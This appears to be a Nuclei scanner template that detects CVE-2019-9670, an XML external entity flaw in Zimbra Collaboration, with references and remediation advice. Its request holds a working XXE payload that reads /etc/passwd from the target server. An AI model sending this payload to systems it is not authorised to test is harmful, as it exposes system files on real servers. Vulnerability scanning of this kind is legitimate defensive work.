63 lines
2.3 KiB
YAML
63 lines
2.3 KiB
YAML
id: CVE-2019-9670
|
|
|
|
info:
|
|
name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
|
|
author: ree4pwn
|
|
severity: critical
|
|
description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
|
|
remediation: |
|
|
Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/46693/
|
|
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
|
|
- https://bugzilla.zimbra.com/show_bug.cgi?id=109129
|
|
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
|
|
- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
|
|
- https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-9670
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2019-9670
|
|
cwe-id: CWE-611
|
|
epss-score: 0.97216
|
|
epss-percentile: 0.99787
|
|
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: synacor
|
|
product: zimbra_collaboration_suite
|
|
tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /Autodiscover/Autodiscover.xml HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<!DOCTYPE xxe [
|
|
<!ELEMENT name ANY >
|
|
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
|
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
|
|
<Request>
|
|
<EMailAddress>aaaaa</EMailAddress>
|
|
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
|
|
</Request>
|
|
</Autodiscover>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'root:.*:0:0:'
|
|
- "Problem accessing"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 503
|
|
|
|
# digest: 4b0a00483046022100a4f1da30077d323eecb6d611f1269898a5f5930db40cb8f49b57f884a8a321fd0221009a55a74b7bbb0028a12b1b48f2d2ac28eae7b8a670e033a6219c9cd4cd355338:922c64590222798bb761d5b6d8e72950
|